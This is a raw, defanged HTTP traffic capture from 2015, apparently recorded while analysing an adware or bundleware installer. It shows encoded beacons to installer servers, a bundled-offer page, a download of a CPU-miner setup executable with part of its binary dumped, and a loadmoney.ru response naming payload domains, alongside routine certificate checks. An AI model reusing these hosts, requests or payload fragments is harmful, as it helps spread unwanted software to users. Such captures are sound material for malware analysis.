<<< skipped >>>

POST /finalize.php HTTP/1.1


Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.amoninst.com/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.amoninst.com
Content-Length: 229
Connection: Keep-Alive
Cache-Control: no-cache

_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=9664&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_updater=0&r_MyBestOffersTodayBR=0.01&updater=3&MyBestOffersTodayBR=2
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Thu, 30 Apr 2015 23:07:14 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 2409
Connection: keep-alive
....<Array><page><f>1</f><fb>1</fb>
;<pt>0</pt><cats>0</cats><updh>1</upd
h><wrn></wrn><comps></comps><must_show&g
t;0</must_show><bdy>PGRpdiBjbGFzcz0iY2xhc3MtMWxpbmVyIj48ZG
l2IGNsYXNzPSJjaGVjay1ob2xkZXIiPjxkaXYgY2xhc3M9ImNsYXNzLWNoZWNrLTEiIGlk
PSJhbWlfY2hlY2tfTXlCZXN0T2ZmZXJzVG9kYXlCUiIgb25jbGljaz0iQW1pQ2hlY2tDdH
JsQ2xpY2tlZCgpIj4NCiAgICAgICAgICAgICAgICAgICAgICAgICA8aW5wdXQgaWQ9Imlf
YW1pX015QmVzdE9mZmVyc1RvZGF5QlIiIG5hbWU9Ik15IEJlc3QgT2ZmZXJzIFRvZGF5Ii
B0eXBlPSJoaWRkZW4iIHZhbHVlPSIxIiAvPjwvZGl2PjxkaXYgY2xhc3M9ImNsYXNzLWxp
bmUxIj48c3Bhbj5UT0RPUyBPUyBESUFTIFVNQSBPRkVSVEEhPC9zcGFuPjwvZGl2PjwvZG
l2PjxkaXYgY2xhc3M9ImNsYXNzLWxpbmUyIj48c3Bhbj5CeSBDbGlja2luZyAiTmV4dCIg
b3IgIkluc3RhbGwiLCBJIGFncmVlIHRvIHRoZSA8YSBocmVmPSJodHRwOi8vZ29vLmdsL2
5pMm1yZSIgdGFyZ2V0PSJfYmxhbmsiPlRlcm1zIG9mIFNlcnZpY2U8L2E IGFuZCA8YSBo
cmVmPSJodHRwOi8vZ29vLmdsL1NIcDhSZyIgdGFyZ2V0PSJfYmxhbmsiPlByaXZhY3kgUG
9saWN5PC9hPiBhbmQgY29uc2VudCB0byBpbnN0YWxsIE15IEJlc3QgT2ZmZXJzIFRvZGF5
Ljwvc3Bhbj48L2Rpdj48L2Rpdj48aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1ZT0iMSIgaW
Q9ImlfYW1pX3VwZGF0ZXIiLz48aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1ZT0idXBkYXRl
cixNeUJlc3RPZmZlcnNUb2RheUJSIiBpZD0iYWxsX3Nob3J0X25hbWVzIi8 </bdy&g
t;<img>__empty__</img></page><page><f>1&
lt;/f><fb>0</fb><pt>1</pt><cats>0<
/cats><updh>1</updh><wrn></wrn><comps>
;</comps><must_show>0</must_show><bdy>DQo8
<<< skipped >>>


GET /fp?alpha=A0E1QRo8DxMHXnc7GmsVAgVmTBoDHSMwWyRAZFVFRRE7FQkVajgxdXQFKDU/K0o1FmJxKl9DW2labB4MAwlIMG1tQHQoG1AVK0NZPBgXIntcXC4VWxdFfT8ScCc3AQYME2xKHVc4Mz59AwYsR1ZcUTUcZwA2U0NcAkZkHQ4QRgofYQs+MAxeBwAmQl97FVMnGFEMMwBBRFQxNQpwLicFUxhBYEccUi00N2QHCjkVSU8ENwQ0VycPQU5NGml9VFlBFxgkfSciDkQMQn8bGCYUAD9kJSklQgRBSWI9G3QvMQMEE0EqCxIxZGtjK0ZAOTMeCQJuQDNBWRdAURxDYx82EFEMGDhgMndVHFZpJkJSDklEXgVHKDYRW2RNYzkHdC8xCnQHY24layI/aEQOXW8YcQ== HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 30 Apr 2015 23:07:14 GMT
Content-Length: 0
....


GET /ii?alpha=Bj59QGU6aDIwbQspUmpqB3ouTWUGYnFoaCMGPBQqWTssQDETAnBWV1UlP1ZXC24hS05FXkoEclhBeBFxA2oEXhNsIj1UfVdjbkUzeShSbWoFcxRCb1N7KW4nZhMoD38BGidXEic2YDMJAA58QjRZXmUdGgZNDkNWGzgvHwYEaQlIFH5heVFnQSRmRzB7OxUuY1ogcw85ET4oP2ZmBCpUC0IwLA81GwIhaUlRajUTYihqJ3MUB0gNQjkTOiwcbQJtBEISfmtqAx8IMWYgU2xhSGouBHd2dmBOb3d7JmxAeQZkUjZlQD8QBCh0BnklMgRrGXcuUQlhEU0WeF17PBtjYyleFkYrf2YDPQY+ezsganhebCQdfSUBMwA9Nj17d1Z/A2lDOmMQOQAXbXZaVydxTCRbNngDRkUUQhxwF01ySy9aKFlQCw1iZhg2A3IIAWE+a0g3cRpkdhUvTjloMSxmATkPcABzIFZiRR8sOwsEdmRGPl8uchcYDEgSSCAeLmxDJw4dUBxQPSprAz4Jbx87XwRPHXo4GXF2ZUp/RVkqMTRdGX8+US10SnA1PzpnSVFsBx92Hm0pSQllWHAxRGMoWEUwWHt1FVUxb2pKIwxvfRBuKTMKOC1JIw86ag9uWUk= HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 30 Apr 2015 23:07:14 GMT
Content-Length: 84
9lqmClH8AOQOJOk5m3YQ8BfkHk7yVeEHI/9WwFpR4k64QEapeOMgY gK51lD6R30Cj/8co
1UT6cmk/h0QTb/....


POST /if?alpha=Bj59QGUAMTN5CB4JUmpqB3ouTWUGYnFoaCMGPBQqWTssQDETAnBWV1UlP1ZXC24hS05FXkoEclhBeBFxA2oEXhNsIj1UfVdjbkUzeShSbWoFcxRCb1N7KW4nZhMoD38BGidXEic2YDMJAA58QjRZXmUdGgZNDkNWGzgvHwYEaQlIFH5pbFEADzc3GUkkZ09VPhh+GFZgVGhwKjg2XXsUPw1tIVdlTUJ5KAkMYmFHMVorewNNUx5hAHgXYXlUM180QxUFPGlpLiEIBGZEMGQ+FSdlRCJlED8VOSkqMiUPA10qDQpCQD8QBjR2XgkbOBhgBW87CQkATA4Qfl4uc181VikMPUo7fmAfPAEmeyJpJGpUaSRUJWtxe09tfX8mKQ8hUyUQETFGJgYAPm9UWmxrVjJEKWYSHwZJAwFyWH51TyYTK1ATSHg2L119V3Q0BmwrYFwjEhp1J0h6SCswWTspFCpWaWMrcBI1EFtraE0JeHcYNholMQNIQEUaQjsbOC4KLlJmAUAZbTw1WWVdYGpPMHs0DCpxBH0vHE9BZ2tpcyQPIlx0dBFOKBFFFiJrWAkIEilKKz4sURRgNVQTZU8kPHoORDpDFQMOZX0YJgY+eyYgGU1oV3cwezhKKWRubmU2JQQiZhEPUGk= HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Content-Length: 78
Connection: Keep-Alive
Cache-Control: no-cache

alpha=Bj59QGV0PEtiFVgoeCQLIWEuU3p8anxhCQEQP3YoRD5NKj8AEyFab1EhISptBn8hSjoHGEcf
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 30 Apr 2015 23:07:14 GMT
Content-Length: 84
9lqmClH8AOQOJOk5m3YQ8BfkHk7yVeEHI/9WwFpR4k64QEapeOMgY gK51lD6R30Cj/8co
1UT6cmk/h0QTb/HTTP/1.1 200 OK..Cache-Control: no-cache, no-store..Prag
ma: no-cache..Content-Type: text/plain; charset=utf-8..Expires: -1..Se
rver: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..SVR: SP001C2..X-
Powered-By: ASP.NET..p3p: CP="CAO PSA OUR"..Date: Thu, 30 Apr 2015 23:
07:14 GMT..Content-Length: 41..{"status":"OK","url":null,"message":nul
l}..



GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1
Cache-Control: max-age = 900
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Mar 2015 05:02:25 GMT
If-None-Match: "a1132b8ef65d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com


HTTP/1.1 304 Not Modified
Content-Type: application/pkix-crl
Last-Modified: Tue, 24 Mar 2015 05:02:25 GMT
ETag: "a1132b8ef65d01:0"
Cache-Control: max-age=900
Date: Thu, 30 Apr 2015 23:11:47 GMT
Connection: keep-alive
HTTP/1.1 304 Not Modified..Content-Type: application/pkix-crl..Last-Mo
dified: Tue, 24 Mar 2015 05:02:25 GMT..ETag: "a1132b8ef65d01:0"..Cache
-Control: max-age=900..Date: Thu, 30 Apr 2015 23:11:47 GMT..Connection
: keep-alive..



GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com


HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Tue, 14 Apr 2015 05:02:07 GMT
Accept-Ranges: bytes
ETag: "2711f7277076d01:0"
Server: Microsoft-IIS/8.5
VTag: 279782516600000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 554
Cache-Control: max-age=900
Date: Thu, 30 Apr 2015 23:12:18 GMT
Connection: keep-alive
0..&0......0...*.H........0y1.0...U....US1.0...U....Washington1.0...U.
...Redmond1.0...U....Microsoft Corporation1#0!..U....Microsoft Code Si
gning PCA..150413163223Z..150713045223Z.a0_0...U.#..0..........X..7.3.
..L...0... .....7.........0...U......Z0... .....7......150712164223Z0.
..*.H.............WK....e.\.-.n......./......."]..E!.. //=...[....w...
 ..........#...[.l.J..f|..... .s......w...J._.......3.[..#.z....ko.I..
Q{....e.nV......F..d}..rF\H.jlH]dQ.E....x......W............j....&L. 2
.$.?...X?.#.(.....pK.v.......y..r....t......=.AW......K.G.gJD.b...



GET /mobile/mt-core.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:07:07 GMT
Server: Apache
Last-Modified: Fri, 04 Mar 2011 18:46:26 GMT
ETag: "1448627-161ce-49dac90326480"
Accept-Ranges: bytes
Content-Length: 90574
Connection: close
Content-Type: application/x-javascript
/*.---.MooTools: the javascript framework..web build:. - hXXp://mootoo
ls.net/core/7c56cfef9dddcf170a5d68e3fb61cfd7..packager build:. - packa
ger build Core/Core Core/Array Core/String Core/Number Core/Function C
ore/Object Core/Event Core/Browser Core/Class Core/Class.Extras Core/S
lick.Parser Core/Slick.Finder Core/Element Core/Element.Style Core/Ele
ment.Event Core/Element.Dimensions Core/Fx Core/Fx.CSS Core/Fx.Tween C
ore/Fx.Morph Core/Fx.Transitions Core/Request Core/Request.HTML Core/R
equest.JSON Core/Cookie Core/JSON Core/DOMReady Core/Swiff..copyrights
:.  - [MooTools](hXXp://mootools.net)..licenses:.  - [MIT License](htt
p://mootools.net/license.txt).....*/.(function(){this.MooTools={versio
n:"1.3.1",build:"af48c8d589f43f32212f9bb8ff68a127e6a3ba6c"};var e=this
.typeOf=function(i){if(i==null){return"null";}if(i.$family){return i.$
family();.}if(i.nodeName){if(i.nodeType==1){return"element";}if(i.node
Type==3){return(/\S/).test(i.nodeValue)?"textnode":"whitespace";}}else
{if(typeof i.length=="number"){if(i.callee){return"arguments";.}if("it
em" in i){return"collection";}}}return typeof i;};var u=this.instanceO
f=function(w,i){if(w==null){return false;}var v=w.$constructor||w.cons
tructor;.while(v){if(v===i){return true;}v=v.parent;}return w instance
of i;};var f=this.Function;var r=true;for(var q in {toString:1}){r=nul
l;}if(r){r=["hasOwnProperty","valueOf","isPrototypeOf","propertyIsEnum
erable","toLocaleString","toString","constructor"];.}f.prototype.overl
oadSetter=function(v){var i=this;return function(x,w){if(x==null){
<<< skipped >>>


GET /CPUminer/cpuminer-x11opt-setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:07:08 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1427702688"
Last-Modified: Mon, 30 Mar 2015 08:04:48 GMT
Cache-Control: max-age=73285
Content-Length: 2586343
Content-Type: application/octet-stream
X-HW: 1430435229.dop007.am4.t,1430435228.cds054.am4.c
Content-Disposition: attachment; filename="cpuminer-x11opt-setup.exe"
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....n
3T.................\...........0.......p....@.........................
.@[email protected]........
...................................................................p..
.............................text...|Z.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] [email protected]...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>


GET /V19/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.amoninst.com/index.php
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: cdn1.lawfuldownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 61399
Connection: keep-alive
Date: Fri, 24 Apr 2015 08:51:14 GMT
Last-Modified: Thu, 19 Feb 2015 14:37:18 GMT
ETag: "52bb6eb78bfd9436ad34be6fc97eae8c"
Accept-Ranges: bytes
Server: AmazonS3
Age: 61933
X-Cache: Hit from cloudfront
Via: 1.1 1215b20e825091002cc9421604422697.cloudfront.net (CloudFront)
X-Amz-Cf-Id: xvLGUt83RdPMDlFA2UmHO8rLncLUKhDgc5SLuQQXMezdvUXxw9WTfg==
    ..//<!-- ../*    Progress bar   */..var g_AmiPbs = new Array();
..var g_AmiPbsEx = new Array();..var g_interval = 0;..var g_initComp =
 0;..var g_possibleComps = [];..var g_reportedComps = [];..var g_remov
edComps = [];....function LogMessage(message) {..    try {..        g_
ami.Log(message);..    }..    catch (excpt) { }..}..function IsDecline
d(name) {..    var declined = 0;..    for (var i = 0; i < g_removed
Comps.length; i  ) {..        if (g_removedComps[i] == name) {..      
      declined = 1;..            break;..        }..    }..    return 
declined;..}..function UpdateSkipStatus(sn) {..    if (g_testa && !Arr
ayContains(g_notest, sn) && !ArrayContains(g_notest1, sn)) {..        
if (g_testa.constructor != Array || ArrayContains(g_testa, sn)) {..   
         g_ami.WriteProfileString(g_testf, '', sn, 'S');..        }.. 
   }..}..function ShortNameFromName(name) {..    for (c = 0; c < g_
comps.length; c  ) {..        if (g_comps[c].name == name) {..        
    return g_comps[c].sn;..        }..    }..    return name;..}..func
tion UpdateComponentsStatus() {..    LogMessage('UpdateComponentsStatu
s function started');..    for (var j = 0; j < g_possibleComps.leng
th; j  ) {..        var reported = 0;..        if (g_possibleComps[j].
sn == 'updater') {..            continue;..        }..        for (var
 i = 0; i < g_reportedComps.length; i  ) {..            if (g_repor
tedComps[i].sn == g_possibleComps[j].sn) {..                reported =
 1;..                break;..            }..        }..        if 
<<< skipped >>>


GET /v4/sof-installer/MAS_WIN7X64_adm_1FEBFBFF000306C3?action=pcm.chromesyn.exist HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
Content-Encoding: gzip
57.............V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<.
...........T..Z.K...H.....0..



GET /get_info?pid=7718 HTTP/1.1
Accept: */*
Host: loadmoney.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: text/html
Content-Length: 70
Connection: keep-alive
X-Powered-By: PHP/5.4.40
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 30 Apr 2015 23:07:08 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: guest_sess_id=g-a79ad5449bfbd23a1412336daed149245542; expires=Fri, 01-May-2015 23:07:08 GMT; path=/; domain=loadmoney.ru
{"rfr":"openpart","dmn":"horses.profsummer.ru","bin_dmn":"brbshop.ru"}
HTTP/1.1 200 OK..Server: nginx..Date: Thu, 30 Apr 2015 23:07:08 GMT..C
ontent-Type: text/html..Content-Length: 70..Connection: keep-alive..X-
Powered-By: PHP/5.4.40..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Last-M
odified: Thu, 30 Apr 2015 23:07:08 GMT..Cache-Control: no-cache, must-
revalidate..Pragma: no-cache..Set-Cookie: guest_sess_id=g-a79ad5449bfb
d23a1412336daed149245542; expires=Fri, 01-May-2015 23:07:08 GMT; path=
/; domain=loadmoney.ru..{"rfr":"openpart","dmn":"horses.profsummer.ru"
,"bin_dmn":"brbshop.ru"}..



GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1762
content-transfer-encoding: binary
Cache-Control: max-age=329046, public, no-transform, must-revalidate
Last-Modified: Mon, 27 Apr 2015 18:34:46 GMT
Expires: Mon, 4 May 2015 18:34:46 GMT
Date: Thu, 30 Apr 2015 23:12:11 GMT
Connection: keep-alive
0..........0..... .....0......0...0......;O}a.!..u...au..eUNp..2015042
7183446Z0s0q0I0... ...................B.>.I.$&.....e......0..C9...3
13..R...%V.......K3.....20150427183446Z....20150504183446Z0...*.H.....
........<........4Tl |..2e....".....7..\.|........H...LdiH..C.#=ty.
A.m2."......,....F..eK.H...t.C...Ak.y...M4.d..n.N..X.Jn...^....:...~.}
R.b..k]....E.]...&...0?.]....8..*E8..1'E:a<..~N.....A...=...d.6...7
..._..R..G.....A%h.0jN.H....`u...^.YX.DW\3$.yG..g..BW....!......0...0.
..0...........2...'U.BM...g.B0...*.H........0..1.0...U....US1.0...U...
.VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 Ve
riSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 P
ublic Primary Certification Authority - G50...141202000000Z..151216235
959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec
 Trust Network1?0=..U...6Symantec Class 3 PCA - G5 OCSP Responder Cert
ificate 30.."0...*.H.............0...............2&..PL...,..2....:..t
H...`JG.%..*...s.c%[email protected]"1.5?..s..
...3[...u......]...R0..Z}....l..I.Y.....j\H.q...#.uw.4qz.#.J.....@2$".
.$l.B.......D.ye..(..2.........@...... ...."... E..0M,..b{.^..s'....f.
6.pr4.J........'j..........0...0...U.......0.0l..U. .e0c0a..`.H...E...
.0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...hXXp://VVV.
symauth.com/rpa0...U.%..0... .......0...U...........0... .....0......0
!..U....0...0.1.0...U....TGV-B-2760...U......;O}a.!..u...au..eUNp0...U
.#..0.....e......0..C9...3130...*.H.............(.&..Dgr.Ve..#...5
<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEALa8SdwQh28+NjkQGqVhx8= HTTP/1.1


Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1725
content-transfer-encoding: binary
Cache-Control: max-age=561798, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 11:15:29 GMT
Expires: Thu, 7 May 2015 11:15:29 GMT
Date: Thu, 30 Apr 2015 23:12:11 GMT
Connection: keep-alive
0..........0..... .....0......0...0......N$p...v....1.;..vn....2015043
0111529Z0s0q0I0... ...................F....0.yV......{&.K......&......
....'[email protected]...*.H........
......9K....i...{.-.?j.L...Y{:.;G<Xq>a.........p..f..N...F.Ki>
;*.l...FzN...*JT...YJ]...2.K.....\.=.Y.LG....L..@.;..^.PS.Gs....'KJ...
8......jE#U1}._.HV...)q_Y<}'t........f(.l .W$....#U....G...q.D...2.
K...L.../...m.t....,.gHk~y..$X.....RH7|.^..h=...uV)..".............0..
.0...0............F...I]A([email protected]...*.H........0..1.0...U....US1.0...U
....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of
 use at hXXps://VVV.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 
Code Signing 2010 CA0...150225000000Z..150526235959Z0..1.0...U....US1.
0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1Ver
iSign Class 3 Code Signing 2010 OCSP Responder0.."0...*.H.............
0.........q<...A...#......A...u..Lz.............o..D.vQ%..s.......f
....e../jI.d.W.....|K;.j5...#.B%.]..~S.... .|;S.&.....N..`...5.....!D.
p....M/.. ..;j...q..`6...2.Ck..BnLHvCZn%....,.w.Ooi..z'...\.Yx......b.
.L...5.o..o..{..}.........%e.....N..._i........*Bc....:yQg.........0..
.0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://www
.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS
 incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0.
..U........0... .....0......0"..U....0...0.1.0...U....TGV-B-31830...*.
H..............-..^.........f.P`...s.....8.....V.......... .... B.
<<< skipped >>>


GET /root.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.globalsign.net


HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:57 GMT
Content-Type: application/x-pkcs7-crl
Content-Length: 649
Connection: keep-alive
Set-Cookie: __cfduid=d9646b74727c3a81fb354a8417669753a1430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.globalsign.net; HttpOnly
Expires: Wed, 15 Jul 2015 00:00:00 GMT
Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT
Cache-Control: public, max-age=6482883
CF-Cache-Status: HIT
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 1df6edc007da0f4b-FRA
0...0..m...0...*.H........0W1.0...U....BE1.0...U....GlobalSign nv-sa1.
0...U....Root CA1.0...U....GlobalSign Root CA..150323000000Z..15071500
0000Z0..0*.........D.....141125000000Z0.0...U.......0*........)E.....1
41125000000Z0.0...U.......0*........ ...h..141125000000Z0.0...U.......
0*........,^.....141125000000Z0.0...U......../0-0...U......00...U.#..0
...`{f.E....P/}..4....K0...*.H.............&...f#...5.[4........{pV.#.
F........:...*Q.....Mx9}....,.S.D.>@.Ju.[)c...`.?.j~...-..{.FHj....
.#.C2.[.,`.......)...Bj2........n...........%......p.6......Q.....1..p
d......F.........mJO.!y.W.......V.M).N.R.....V..|...7.ry. ..gy..I\....
.....j....... .z.E..".HTTP/1.1 200 OK..Date: Thu, 30 Apr 2015 23:11:57
 GMT..Content-Type: application/x-pkcs7-crl..Content-Length: 649..Conn
ection: keep-alive..Set-Cookie: __cfduid=d9646b74727c3a81fb354a8417669
753a1430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.g
lobalsign.net; HttpOnly..Expires: Wed, 15 Jul 2015 00:00:00 GMT..Last-
Modified: Mon, 23 Mar 2015 00:00:00 GMT..Cache-Control: public, max-ag
e=6482883..CF-Cache-Status: HIT..Accept-Ranges: bytes..Server: cloudfl
are-nginx..CF-RAY: 1df6edc007da0f4b-FRA..0...0..m...0...*.H........0W1
.0...U....BE1.0...U....GlobalSign nv-sa1.0...U....Root CA1.0...U....Gl
obalSign Root CA..150323000000Z..150715000000Z0..0*.........D.....1411
25000000Z0.0...U.......0*........)E.....141125000000Z0.0...U.......0*.
....... ...h..141125000000Z0.0...U.......0*........,^.....141125000000
Z0.0...U......../0-0...U......00...U.#..0...`{f.E....P/}..4....K0.
<<< skipped >>>


POST /ocsp HTTP/1.1
Host: clients1.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Connection: keep-alive
Content-Length: 107

0i0g0E0C0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
.sR'..i..0.0... .....0...
0... .....0..
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 30 Apr 2015 23:07:21 GMT
Expires: Mon, 04 May 2015 23:07:21 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=1
0..........0..... .....0......0...0......J......h.v....b..Z./..2015043
0131328Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
...sR'..i....20150430131328Z....20150507131328Z0...*.H.............m..
f.....~.A.$.o....q.\.F.B..........k.-.cL".u..../.l..KW...(.,..X1.v-...
.3CD..N.....d..(a.,u..S...-.I.F.Nv..:....{..2..g{.i....S.Vr]..8.P"t'..
.....O....T.k#<S&..=....].-8.{~ls.,Oie.in...N..~...|!..N%....@....,
ck.Z....,E....."...C].#...............nzN....AHTTP/1.1 200 OK..Content
-Type: application/ocsp-response..Date: Thu, 30 Apr 2015 23:07:21 GMT.
.Expires: Mon, 04 May 2015 23:07:21 GMT..Cache-Control: public, max-ag
e=345600..Server: ocsp_responder..Content-Length: 463..X-XSS-Protectio
n: 1; mode=block..X-Frame-Options: SAMEORIGIN..Alternate-Protocol: 80:
quic,p=1..0..........0..... .....0......0...0......J......h.v....b..Z.
/..20150430131328Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v.
...b..Z./....sR'..i....20150430131328Z....20150507131328Z0...*.H......
.......m..f.....~.A.$.o....q.\.F.B..........k.-.cL".u..../.l..KW...(.,
..X1.v-....3CD..N.....d..(a.,u..S...-.I.F.Nv..:....{..2..g{.i....S.Vr]
..8.P"t'.......O....T.k#<S&..=....].-8.{~ls.,Oie.in...N..~...|!..N%
....@....,ck.Z....,E....."...C].#...............nzN....A....
<<< skipped >>>

POST /ocsp HTTP/1.1


Host: clients1.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
